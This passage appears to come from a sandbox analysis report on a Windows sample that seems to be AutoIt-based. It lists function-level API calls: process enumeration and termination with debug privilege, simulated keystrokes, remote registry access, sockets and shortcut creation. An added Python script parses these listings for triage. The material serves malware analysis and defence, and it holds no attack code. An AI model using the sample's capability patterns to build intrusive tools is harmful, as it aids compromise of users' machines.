                                        • Instruction ID: 96c2ff3288524e5177ddaea858befcc54399262d047aa0323054173f9f9c043b
                                        • Opcode Fuzzy Hash: 12955ee60cd54a10aeeca93e6787ff71592a3edaf38f4eb65b25339bc6d59c1e
                                        • Instruction Fuzzy Hash: 09317AB1600605AFDB229FA1DD49A76BBF9FF09300B14841DFC9B82610D739E8149BA0
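The function listings above (the ICMP ping routine at ref 00770F19, the ListBox/ComboBox control routine at ref 007528D3, and the two WinINet routines at refs 0076CBCF and 0076CADF) are easier to triage when the call chains are pulled out of the report format and tagged by the capability their imports imply. The script below is an added example written for this page, not code from Joe Sandbox or from the sample; it parses blocks in exactly the layout shown here. The capability map, the Win32 message table and all function names are the editor's own assumptions, and the sample input is constructed by copying the ping and ListBox listings from this page.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.

Added example, not code from the report or from Joe Security: it parses blocks
in the layout shown on this page, keeps each function's API call chain with
module and reference address, tags the function with the capability its imports
imply, and decodes the Win32 message IDs passed to SendMessageW/PostMessageW.
MODULE_CAPS and MESSAGES are the editor's assumptions, not sandbox output.
"""
import re
from typing import Dict, List

# One call line: "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR".
# "Part of subcall function XXXX:" marks a call inherited from a callee.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
STRINGS_RE = re.compile(r"•\s*String ID:[ \t]*(.*)$", re.M)

# Assumed capability map keyed by import module (editor's choice).
MODULE_CAPS = {
    "WSOCK32": "network", "WS2_32": "network", "WININET": "network",
    "IPHLPAPI": "network", "OLEAUT32": "com-automation", "USER32": "gui",
}
# Assumed decode table for message IDs that appear on this page.
MESSAGES = {
    0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND",
    0x0186: "LB_SETCURSEL", 0x018C: "LB_SELECTSTRING", 0x1004: "LVM_GETITEMCOUNT",
}
MSG_FUNCS = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}

# Constructed sample: the ping and ListBox listings copied from this page.
SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00770F19
• inet_addr.WSOCK32(?), ref: 00770F79
• gethostbyname.WSOCK32(?), ref: 00770F85
• IcmpCreateFile.IPHLPAPI ref: 00770F93
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00771023
• IcmpCloseHandle.IPHLPAPI(?), ref: 00771116
• WSACleanup.WSOCK32 ref: 0077111C
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
APIs
  • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
  • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 007528D3
• GetDlgCtrlID.USER32 ref: 007528DE
• GetParent.USER32 ref: 007528FA
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007528FD
Strings
• String ID: ComboBox$ListBox
"""


def decode_message(arg: str) -> str:
    """Map a hex message argument to a name; '?' means the sandbox could not resolve it."""
    if arg == "?":
        return "?"
    value = int(arg, 16)
    return MESSAGES.get(value, f"0x{value:04X}")


def classify(calls: List[Dict]) -> set:
    """Capabilities implied by the function's own (non-subcall) imports."""
    return {MODULE_CAPS[c["module"]] for c in calls
            if c["subcall"] is None and c["module"] in MODULE_CAPS}


def parse_blocks(text: str) -> List[Dict]:
    """Split the listing at each 'APIs' header and parse the call lines that follow."""
    blocks: List[Dict] = []
    for chunk in re.split(r"^\s*APIs\s*$", text, flags=re.M)[1:]:
        calls: List[Dict] = []
        for line in chunk.splitlines():
            m = API_RE.match(line)
            if not m:
                continue
            call = {
                "name": m["name"], "module": m["module"].upper(),
                "args": [a for a in (m["args"] or "").split(",") if a],
                "ref": int(m["ref"], 16), "subcall": m["sub"],
            }
            # uMsg is the second argument of Send/PostMessage.
            if call["name"] in MSG_FUNCS and len(call["args"]) > 1:
                call["message"] = decode_message(call["args"][1])
            calls.append(call)
        sm = STRINGS_RE.search(chunk)
        strings = [s for s in sm.group(1).strip().split("$") if s] if sm else []
        if calls:
            blocks.append({"calls": calls, "caps": classify(calls), "strings": strings})
    return blocks


def call_chain(block: Dict) -> str:
    """The function's own calls in address order, e.g. 'WSAStartup -> inet_addr -> ...'."""
    own = sorted((c for c in block["calls"] if c["subcall"] is None), key=lambda c: c["ref"])
    return " -> ".join(c["name"] for c in own)


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(sorted(b["caps"]), b["strings"], call_chain(b))
```

Calls inherited from a subcall are kept but excluded from the capability tag, so a GUI helper is not marked "network" just because a callee pings; the second SendMessageW in the ListBox block shows the sandbox's own argument misalignment (the message ID sits in the third slot), which the decoder reports as "?" rather than guessing.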
                                        APIs
                                          • Part of subcall function 007542CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 007542E6
                                          • Part of subcall function 007542CC: GetCurrentThreadId.KERNEL32 ref: 007542ED
                                          • Part of subcall function 007542CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752E43), ref: 007542F4
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752E4D
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00752E6B
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00752E6F
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752E79
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00752E91
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00752E95
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752E9F
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00752EB3
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00752EB7
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00751CD9,?,?,00000000), ref: 0075209C
                                        • HeapAlloc.KERNEL32(00000000,?,00751CD9,?,?,00000000), ref: 007520A3
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00751CD9,?,?,00000000), ref: 007520B8
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00751CD9,?,?,00000000), ref: 007520C0
                                        • DuplicateHandle.KERNEL32(00000000,?,00751CD9,?,?,00000000), ref: 007520C3
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00751CD9,?,?,00000000), ref: 007520D3
                                        • GetCurrentProcess.KERNEL32(00751CD9,00000000,?,00751CD9,?,?,00000000), ref: 007520DB
                                        • DuplicateHandle.KERNEL32(00000000,?,00751CD9,?,?,00000000), ref: 007520DE
                                        • CreateThread.KERNEL32(00000000,00000000,00752104,00000000,00000000,00000000), ref: 007520F8
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        APIs
                                          • Part of subcall function 0075DC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 0075DCC1
                                          • Part of subcall function 0075DC9C: Process32FirstW.KERNEL32(00000000,?), ref: 0075DCCF
                                          • Part of subcall function 0075DC9C: CloseHandle.KERNELBASE(00000000), ref: 0075DD9C
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077AACC
                                        • GetLastError.KERNEL32 ref: 0077AADF
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077AB12
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0077ABC7
                                        • GetLastError.KERNEL32(00000000), ref: 0077ABD2
                                        • CloseHandle.KERNEL32(00000000), ref: 0077AC23
                                        Strings
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00784284
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00784299
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007842B3
                                        • _wcslen.LIBCMT ref: 007842F8
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00784325
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00784353
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$Window_wcslen
                                        • String ID: SysListView32
                                        • API String ID: 2147712094-78025650
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075C5D9
                                        • IsMenu.USER32(00000000), ref: 0075C5F9
                                        • CreatePopupMenu.USER32 ref: 0075C62F
                                        • GetMenuItemCount.USER32(00D75C98), ref: 0075C680
                                        • InsertMenuItemW.USER32(00D75C98,?,00000001,00000030), ref: 0075C6A8
                                        Strings
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 642191829-3771769585
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007742C8
                                        • CharUpperBuffW.USER32(?,?), ref: 007743D7
                                        • _wcslen.LIBCMT ref: 007743E7
                                        • VariantClear.OLEAUT32(?), ref: 0077457C
                                          • Part of subcall function 007615B3: VariantInit.OLEAUT32(00000000), ref: 007615F3
                                          • Part of subcall function 007615B3: VariantCopy.OLEAUT32(?,?), ref: 007615FC
                                          • Part of subcall function 007615B3: VariantClear.OLEAUT32(?), ref: 00761608
                                        Strings
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4137639002-1221869570
                                        APIs
                                        • GetMenu.USER32(?), ref: 00782AE2
                                        • GetMenuItemCount.USER32(00000000), ref: 00782B14
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00782B3C
                                        • _wcslen.LIBCMT ref: 00782B72
                                        • GetMenuItemID.USER32(?,?), ref: 00782BAC
                                        • GetSubMenu.USER32(?,?), ref: 00782BBA
                                          • Part of subcall function 007542CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 007542E6
                                          • Part of subcall function 007542CC: GetCurrentThreadId.KERNEL32 ref: 007542ED
                                          • Part of subcall function 007542CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752E43), ref: 007542F4
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00782C42
                                          • Part of subcall function 0075F1A7: Sleep.KERNEL32 ref: 0075F21F
                                        Similarity
                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 4196846111-0
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 00788896
                                        • IsWindowEnabled.USER32(00000000), ref: 007888A2
                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0078897D
                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 007889B0
                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 007889E8
                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00788A0A
                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00788A22
                                        Similarity
                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                        • String ID:
                                        • API String ID: 4072528602-0
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007580D1
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007580F7
                                        • SysAllocString.OLEAUT32(00000000), ref: 007580FA
                                        • SysAllocString.OLEAUT32 ref: 0075811B
                                        • SysFreeString.OLEAUT32 ref: 00758124
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0075813E
                                        • SysAllocString.OLEAUT32(?), ref: 0075814C
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 00760DAE
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00760DEA
                                        Strings
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00760E82
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00760EBD
                                        Strings
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        APIs
                                          • Part of subcall function 006F771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F7759
                                          • Part of subcall function 006F771B: GetStockObject.GDI32(00000011), ref: 006F776D
                                          • Part of subcall function 006F771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 006F7777
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00784A71
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00784A7E
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00784A89
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00784A98
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00784AA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: 2dfdbe4749a098203f8125908b41b7c089e6e0f7f11991b929a98b48a923cc81
                                        • Instruction ID: 33bb886f79b0c780808f59a226b693035d17425b2dd3f1e5c2b6f5504af8e5fd
                                        • Opcode Fuzzy Hash: 2dfdbe4749a098203f8125908b41b7c089e6e0f7f11991b929a98b48a923cc81
                                        • Instruction Fuzzy Hash: D31186B119011EBEEF119F64CC85EE77F9DEF08758F118111BB14A6090C6759C21DBA4
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0075E23D
                                        • LoadStringW.USER32(00000000), ref: 0075E244
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0075E25A
                                        • LoadStringW.USER32(00000000), ref: 0075E261
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0075E2A5
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 0075E282
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 4072794657-3128320259
                                        • Opcode ID: d599489b1973316da576ef68234a755fd4c353c4d8fba775edf3364e1073b5bd
                                        • Instruction ID: 93efb85b5fd770f98ba9563ba987437ae56c76b3bddc7dd531bf789a8836ca3d
                                        • Opcode Fuzzy Hash: d599489b1973316da576ef68234a755fd4c353c4d8fba775edf3364e1073b5bd
                                        • Instruction Fuzzy Hash: AA0136F694020CBFE721A7D4DD8DEE7776CEB08311F1145A1BB45E2081EAB89E848B75
                                        APIs
                                        • __allrem.LIBCMT ref: 0072044A
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00720466
                                        • __allrem.LIBCMT ref: 0072047D
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0072049B
                                        • __allrem.LIBCMT ref: 007204B2
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007204D0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                        • Instruction ID: 67cc553aeffdf21fbede6e579e0ce74989248511e5c35723aeb7f7b2a8c935d3
                                        • Opcode Fuzzy Hash: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                        • Instruction Fuzzy Hash: 0E81F872600725DBE724EF69EC85B6A73E9EF45320F24812EF611D6283E778D94187E0
                                        APIs
                                          • Part of subcall function 00773AA6: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00771979,00000000,?,?,00000000), ref: 00773AF2
                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0077271D
                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0077273E
                                        • WSAGetLastError.WSOCK32 ref: 0077274F
                                        • inet_ntoa.WSOCK32(?), ref: 007727E9
                                        • htons.WSOCK32(?,?,?,?,?), ref: 00772838
                                        • _strlen.LIBCMT ref: 00772892
                                          • Part of subcall function 00754277: _strlen.LIBCMT ref: 00754281
                                          • Part of subcall function 006F86FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0070C15A,?,?,?), ref: 006F871A
                                          • Part of subcall function 006F86FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0070C15A,?,?,?,?,006FAEB9,?,?), ref: 006F874D
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                        • String ID:
                                        • API String ID: 1923757996-0
                                        • Opcode ID: 588e59bc508cc43834258a841f07037f6569398cced7c045d7cf01e0e09538e2
                                        • Instruction ID: cbf3b8a3c50447949d77058f7260c869d7a22de322f2222b4b1d188b2e9e4682
                                        • Opcode Fuzzy Hash: 588e59bc508cc43834258a841f07037f6569398cced7c045d7cf01e0e09538e2
                                        • Instruction Fuzzy Hash: 0DA1F331204300AFD714DF24C895F2A77E5AF84354F54854CF5AA9B2A3DB39ED86CB91
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00718669,00718669,?,?,?,007267DF,00000001,00000001,8BE85006), ref: 007265E8
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007267DF,00000001,00000001,8BE85006,?,?,?), ref: 0072666E
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00726768
                                        • __freea.LIBCMT ref: 00726775
                                          • Part of subcall function 00723BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A99,?,0000015D,?,?,?,?,007185D0,000000FF,00000000,?,?), ref: 00723BE2
                                        • __freea.LIBCMT ref: 0072677E
                                        • __freea.LIBCMT ref: 007267A3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 73c40ebbf0b90aae9fcb92677b997668c00f188751cc249335df52387b62f3c1
                                        • Instruction ID: ec3206d7e501c76e2a8663777296d7dc13adde602dd1c22c6a3f5578a037edd8
                                        • Opcode Fuzzy Hash: 73c40ebbf0b90aae9fcb92677b997668c00f188751cc249335df52387b62f3c1
                                        • Instruction Fuzzy Hash: 2C51D372600226ABEB259F64EC85EBB77A9EF44754F25462AFC04D6290EB3CDC50C690
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 0077D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C00D,?,?), ref: 0077D314
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D350
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3C7
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3FD
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C629
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C684
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077C6C9
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0077C6F8
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077C752
                                        • RegCloseKey.ADVAPI32(?), ref: 0077C75E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                        • String ID:
                                        • API String ID: 1120388591-0
                                        • Opcode ID: 6e4b6f5cb3a00285ba3323fcbe5726cf4239fa5cbcd908e504231b01f499abff
                                        • Instruction ID: 1cd054485c936478dbf4dde97822ec3c08fff4b35fbe20c8b14ea0fbd72f4c2c
                                        • Opcode Fuzzy Hash: 6e4b6f5cb3a00285ba3323fcbe5726cf4239fa5cbcd908e504231b01f499abff
                                        • Instruction Fuzzy Hash: F081BC70208245AFDB15DF24C884E2ABBF5FF88348F14849CF5498B2A2DB35ED45CB92
                                        APIs
                                        • VariantInit.OLEAUT32(00000035), ref: 00750049
                                        • SysAllocString.OLEAUT32(00000000), ref: 007500F0
                                        • VariantCopy.OLEAUT32(007502F4,00000000), ref: 00750119
                                        • VariantClear.OLEAUT32(007502F4), ref: 0075013D
                                        • VariantCopy.OLEAUT32(007502F4,00000000), ref: 00750141
                                        • VariantClear.OLEAUT32(?), ref: 0075014B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy$AllocInitString
                                        • String ID:
                                        • API String ID: 3859894641-0
                                        • Opcode ID: f97450738e5f27eb9fa862576458a30b31dfe9ef2956315c8c50acd4a51a2533
                                        • Instruction ID: 4d0f24e10de42dbb3744a6a39103287051450ac1dd3bc9e59dda3dbdb75ac0a6
                                        • Opcode Fuzzy Hash: f97450738e5f27eb9fa862576458a30b31dfe9ef2956315c8c50acd4a51a2533
                                        • Instruction Fuzzy Hash: 29510835540318EACF20AB649889BAD73A5BF05311F24944AED05DF2D6EBF89C48CBD6
                                        APIs
                                        • _wcslen.LIBCMT ref: 00766E36
                                        • CoInitialize.OLE32(00000000), ref: 00766F93
                                        • CoCreateInstance.OLE32(00790CC4,00000000,00000001,00790B34,?), ref: 00766FAA
                                        • CoUninitialize.OLE32 ref: 0076722E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: 813381e61152b70fb5aa916161d465a20d8e4856311842a88736eff3ce3fda0b
                                        • Instruction ID: e77c511372919206e5521b0d1ae884bf1782cb03b8104cb6ce3f21139929305e
                                        • Opcode Fuzzy Hash: 813381e61152b70fb5aa916161d465a20d8e4856311842a88736eff3ce3fda0b
                                        • Instruction Fuzzy Hash: 8FD14771608205AFC344DF24C881DAAB7E9FF94704F40495DF6968B2A2DB71ED05CB92
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0074FB8F,00000000,?,?,00000000,?,007339BC,00000004,00000000,00000000), ref: 00788BAB
